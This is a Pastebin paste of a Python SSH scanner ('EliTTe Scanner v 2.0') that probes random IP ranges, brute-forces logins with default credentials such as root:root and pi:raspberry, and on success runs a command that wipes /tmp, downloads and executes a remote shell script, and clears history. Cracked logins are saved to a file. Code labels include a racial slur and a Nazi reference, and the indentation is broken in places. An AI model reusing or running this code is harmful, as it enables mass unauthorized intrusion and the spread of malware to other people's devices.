Advertisement
KekSec

elitte.py ssh scanner

Jul 21st, 2017
1,231
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.39 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # python elitte.py 500 DARK 1 1
  3. # python elitte.py 500 FUCK 1 4
  4. # python elitte.py 500 SAMY 1 6
  5. # python elitte.py 500 HITLER 1 3
  6. # python elitte.py 999 B 122.131 1
  7. # RANGES 31.188, 122.131, 122.3, 122.52, 179.105, 46.62, 125.27, 101.109,
  8. #passwords 1, 2,3,4,5,6,7
  9. import threading, paramiko, random, socket, time, sys
  10.  
  11. paramiko.util.log_to_file("/dev/null")
  12.  
  13. blacklist = [
  14.     '127'
  15. ]
  16.  
  17. passwords = [
  18.     "admin:admin"
  19.     "root:root"
  20.     "root:admin"
  21.     "telnet:telnet"
  22.     "guest:guest"
  23.     "admin:admin"
  24.     "admin:1234"
  25.     "pi:raspberry"
  26.     "vagrant:vagrant"
  27.     "ubnt:ubnt"
  28. ]
  29.  
  30.  
  31. if sys.argv[4] == '1':
  32.      passwords = ["root:root"]
  33. if sys.argv[4] == '2':
  34.      passwords = ["guest:guest"]
  35. if sys.argv[4] == '3':
  36.      passwords = ["admin:1234"]
  37. if sys.argv[4] == '4':
  38.      passwords = ["telnet:telnet"]
  39. if sys.argv[4] == '5':
  40.     passwords = ["root:root", "admin:1234"]
  41. if sys.argv[4] == '6':
  42.     passwords = ["root:root", "root:admin"]
  43. if sys.argv[4] == '7':
  44.     passwords = ["root:root", "admin:admin", "root:admin", "admin:1234"]
  45. if sys.argv[4] == '8':
  46.     passwords = ["root:root", "admin:1234", "root:admin", "user:user", "test:test"]
  47. if sys.argv[4] == 'perl':
  48.     passwords = ["pi:raspberry", "vagrant:vagrant", "ubnt:ubnt"]    
  49.    
  50. print "\x1b[1;32m************************************\x1b[1;35m"
  51. print "\x1b[1;32m*       EliTTe Scanner v 2.0       *\x1b[1;35m"
  52. print "\x1b[1;32m*       Made By Darkuss Andrew     *\x1b[1;35m"
  53. print "\x1b[1;32m*       FB.com/superdarkussandrew  *\x1b[1;35m"
  54. print "\x1b[1;32m*       YM: psihicdeliric          *\x1b[1;35m"
  55. print "\x1b[1;32m*       Skype: psihic.deliric      *\x1b[1;35m"
  56. print "\x1b[1;32m*       http://elitte-squad.ro     *\x1b[1;35m"
  57. print "\x1b[1;32m************************************\x1b[1;35m"
  58.  
  59. ipclassinfo = sys.argv[2]
  60. if ipclassinfo == "A":
  61.     ip1 = sys.argv[3]
  62. elif ipclassinfo == "B":
  63.     ip1 = sys.argv[3].split(".")[0]
  64.     ip2 = sys.argv[3].split(".")[1]
  65. elif ipclassinfo == "C":
  66.     ips = sys.argv[3].split(".")
  67.     num=0
  68.     for ip in ips:
  69.         num=num+1
  70.         if num == 1:
  71.             ip1 = ip
  72.         elif num == 2:
  73.             ip2 = ip
  74.         elif num == 3:
  75.             ip3 = ip
  76. class sshscanner(threading.Thread):
  77.     global passwords
  78.     global ipclassinfo
  79.     if ipclassinfo == "A":
  80.         global ip1
  81.     elif ipclassinfo == "B":
  82.         global ip1
  83.         global ip2
  84.     elif ipclassinfo == "C":
  85.         global ip1
  86.         global ip2
  87.         global ip3
  88.     def run(self):
  89.         while 1:
  90.             try:
  91.                 while 1:
  92.                     thisipisbad='no'
  93.                     if ipclassinfo == "A":
  94.                         self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  95.                     elif ipclassinfo == "B":
  96.                         self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  97.                     elif ipclassinfo == "C":
  98.                         self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  99.                     elif ipclassinfo == "SAMY": # password 6
  100.                         br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  101.                         self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  102.                     elif ipclassinfo == "LRAB": #password 7
  103.                         yeet = ["122","119","161","37","186","187","31","188","201","2","168"]
  104.                         self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  105.                     elif ipclassinfo == "DARK": # password 1
  106.                         lucky = ["125.27","179.105","31.188","118.173","46.62","5.78","125.25","125.26","122.3","125.24","180.182"]
  107.                         self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  108.                     elif ipclassinfo == "HITLER": #password 3
  109.                         lucky2 = [ "122.3","122.52","122.54","122.131","124.105","125.104","49.144","49.145" ]
  110.             self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  111.             elif ipclassinfo == "FUCK": # password 4
  112.                         lucky2 = [ "202.44","131.0","43.239","85.99","186.45","122.2","122.54","122.56","122.132","124.106","125.107","49.146","49.145" ]
  113.             self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  114.                     elif ipclassinfo == "RAND":
  115.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  116.                     elif ipclassinfo == "INTERNET":
  117.                         lol = ["1"]
  118.                         self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  119.                     else:
  120.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  121.                     for badip in blacklist:
  122.                         if badip in self.host:
  123.                             thisipisbad='yes'
  124.                     if thisipisbad=='no':
  125.                         break
  126.                 username='root'
  127.                 password=""
  128.                 port = 22
  129.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  130.                 s.settimeout(3)
  131.                 s.connect((self.host, port))
  132.                 s.close()
  133.                 ssh = paramiko.SSHClient()
  134.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  135.                 dobreak=False
  136.                 for passwd in passwords:
  137.                     if ":n/a" in passwd:
  138.                         password=""
  139.                     else:
  140.                         password=passwd.split(":")[1]
  141.                     if "n/a:" in passwd:
  142.                         username=""
  143.                     else:
  144.                         username=passwd.split(":")[0]
  145.                     try:
  146.                         ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  147.                         dobreak=True
  148.                         break
  149.                     except:
  150.                         pass
  151.                     if True == dobreak:
  152.                         break
  153.                 badserver=True
  154.                 stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  155.                 output = stdout.read()
  156.                 if "inet addr" in output:
  157.                     badserver=False
  158.                 if badserver == False:
  159.                         print '\x1b[1;32mRooted Payload Sent OK ~\x1b[1;31m '+self.host+'~\x1b[1;35m'+username+'~\x1b[1;36m'+password+'~\x1b[1;33m'+str(port)
  160.             ssh.exec_command("cd /tmp || cd /var/run; rm -rf *; wget -q http://1.1.1.1/stun.sh; chmod +x stun.sh; sh stun.sh; histroy -c")
  161.             nigger = open("cheatsvuln.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  162.                         time.sleep(15)
  163.                         ssh.close()
  164.             except:
  165.                 pass
  166.  
  167. for x in range(0,1500):
  168.     try:
  169.         t = sshscanner()
  170.         t.start()
  171.     except:
  172.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement